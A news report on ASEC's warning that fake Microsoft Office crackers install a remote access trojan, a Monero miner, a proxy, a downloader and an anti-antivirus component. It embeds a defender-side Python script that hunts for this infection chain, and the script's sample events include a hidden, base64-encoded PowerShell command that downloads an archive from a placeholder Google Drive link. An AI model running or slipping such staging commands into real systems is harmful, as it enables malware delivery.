Hackers Disguised as Microsoft Office Crackers to Spread Malware

TapTechNews, May 31: AhnLab Security Intelligence Center (ASEC) today published a warning blog post stating that attackers are disguising malware as Microsoft Office crackers to distribute remote access trojans (RATs), cryptocurrency miners, malware downloaders and other malicious software.


The post notes that the attacker carefully designed the interface of the Office cracking tool: users can choose which version to install, the language, and whether to use the 32-bit or 64-bit variant.

In the background, however, the cracking tool launches an obfuscated .NET malware that contacts Telegram or Mastodon channels, retrieves a valid URL from them, and downloads further components from that URL.


The URL points to Google Drive or GitHub; the base64-encoded payload hosted there contains PowerShell commands that, once unpacked with 7-Zip, install a series of malware components on the system.
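A defender-side way to hunt for this chain in endpoint telemetry, as an added example that is not part of the ASEC post or this article: it correlates, over constructed Sysmon-style process and network events, a non-browser process contacting Telegram/Mastodon, an encoded PowerShell child whose decoded script fetches from Google Drive or GitHub, and a 7-Zip extraction in the same process tree. The host lists, browser names, event fields and the mastodon.social instance are assumptions.

```python
# Added example (not ASEC's or TapTechNews' code): correlates the three stages the article
# describes over constructed Sysmon-style events. mastodon.social is an assumed instance name.
import base64
import re

C2_HOSTS = ("api.telegram.org", "t.me", "mastodon.social")
FETCH_HOSTS = ("drive.google.com", "github.com", "raw.githubusercontent.com")
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe")  # legitimately reach C2_HOSTS
SCRIPT = r"Invoke-WebRequest 'https://drive.google.com/uc?id=PLACEHOLDER' -OutFile $env:TEMP\pkg.7z"
ENC = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
EVENTS = [  # constructed, oldest first; Drive id is a placeholder; pid 500 is a benign browser
    {"type": "proc", "pid": 400, "ppid": 300, "image": r"C:\Users\u\Downloads\OfficeCrack.exe", "cmd": "OfficeCrack.exe"},
    {"type": "net", "pid": 400, "ppid": 300, "image": r"C:\Users\u\Downloads\OfficeCrack.exe", "dest": "api.telegram.org"},
    {"type": "proc", "pid": 401, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -EncodedCommand " + ENC},
    {"type": "proc", "pid": 402, "ppid": 401, "image": r"C:\Program Files\7-Zip\7z.exe", "cmd": r"7z.exe x %TEMP%\pkg.7z -o%TEMP%\pkg"},
    {"type": "net", "pid": 500, "ppid": 1, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "dest": "api.telegram.org"},
]

def decode_encoded_command(cmd):
    """Decode the UTF-16LE base64 script after -EncodedCommand (or -e/-ec/-enc); '' if none."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def is_descendant(pid, root, parent_of):
    while pid in parent_of:  # walk up the process tree until root or an unknown parent
        pid = parent_of[pid]
        if pid == root:
            return True
    return False

def hunt(events):
    """Map each suspicious root pid to the chain stages seen in its process tree."""
    parent_of = {e["pid"]: e["ppid"] for e in events if e["type"] == "proc"}
    exe = lambda e: e["image"].rsplit("\\", 1)[-1].lower()
    # Stage 1: a non-browser process contacts the Telegram/Mastodon channel that serves the URL.
    roots = {e["pid"]: ["c2_channel_lookup"] for e in events
             if e["type"] == "net" and e["dest"] in C2_HOSTS and exe(e) not in BROWSERS}
    for root, stages in roots.items():
        for e in (x for x in events if x["type"] == "proc" and is_descendant(x["pid"], root, parent_of)):
            # Stage 2: encoded PowerShell whose decoded script fetches from Google Drive/GitHub.
            if exe(e) == "powershell.exe" and any(h in decode_encoded_command(e["cmd"]) for h in FETCH_HOSTS):
                stages.append("encoded_ps_fetch")
            # Stage 3: 7-Zip extraction run from that PowerShell's tree.
            if exe(e) in ("7z.exe", "7za.exe") and re.search(r"\s[xe]\s", e["cmd"]):
                stages.append("7zip_unpack")
    return roots
```

Running `hunt(EVENTS)` flags only pid 400 with all three stages; the browser's own Telegram connection (pid 500) is not reported.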


According to ASEC, the malware then installs various components on the compromised system; TapTechNews lists them as follows:

OrcusRAT: Enables full remote control, including keylogging, webcam access, screen capture and system operations, for data exfiltration.

XMRig: A cryptocurrency miner that uses system resources to mine Monero; it stops mining when resource usage is already high, such as when the victim is playing games, to avoid detection.

3Proxy: Turns the infected system into a proxy server by opening port 3306 and injecting itself into legitimate processes, allowing attackers to route malicious traffic through it.

PureCrypter: Downloads and executes additional payloads from external servers, keeping the system infected with the attacker's latest components.

AntiAV: Disrupts and disables security software by modifying its configuration files so that it no longer functions properly, leaving the system open to manipulation by the other components.
